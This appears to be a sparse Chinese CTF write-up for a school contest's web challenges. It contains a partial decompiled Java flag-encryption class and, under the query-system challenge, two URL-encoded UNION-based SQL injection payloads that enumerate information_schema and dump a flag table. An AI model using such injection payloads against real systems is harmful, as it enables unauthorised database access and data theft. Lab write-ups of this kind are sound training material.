第四届商师校赛 web 1

RceMe

ezGame

伪装

Ping

Are you from SQNU?

Look for the homepage

Through

根据题目慢慢试

File_download

Post上传得到下载文件

反编译一下

/*

* Decompiled with CFR 0.152.

*

* Could not load the following classes:

* javax.servlet.http.HttpServlet

*/

package com.ctf.flag;

import java.util.ArrayList;

import java.util.Scanner;

import javax.servlet.http.HttpServlet;

public class FlagManager

extends HttpServlet {

public static void main(String[] args) {

Scanner sc = new Scanner(System.in);

System.out.println("Please input your flag: ");

String str = sc.next();

System.out.println("Your input is: ");

System.out.println(str);

char[] stringArr = str.toCharArray();

FlagManager.Encrypt(stringArr);

}

public static void Encrypt(char[] arr) {

ArrayList<Integer> Resultlist = new ArrayList<Integer>();

for (int i = 0; i < arr.length; ++i) {

int result = arr[i] + 38 ^ 0x30;

Resultlist.add(result);

}

int[] key = new int[]{110, 107, 185, 183, 183, 186, 103, 185, 99, 105,

105, 187, 105, 99, 102, 184, 185, 103, 99, 108, 186, 107, 187, 99, 183, 109, 105,

184, 102, 106, 106, 188, 109, 186, 111, 188};

ArrayList<Integer> Keylist = new ArrayList<Integer>();

for (int j = 0; j < key.length; ++j) {

Keylist.add(key[j]);

}

然后用python写出解密脚本即可得出flag

为

商师一日游

自私的小s

进入end.php

小小查询系统

id=-1%27%20UNION%20SELECT%201,group_concat(column_name),3%20FROM%20information_schema.columns%20WHERE%20table_schema%20=%20%27ctf%27%20AND%20table_name%20=%20%27flag%27--+

?id=-1%27%20UNION%20SELECT%201,value,group_concat(value)%20from%20ctf.flag%20%20--+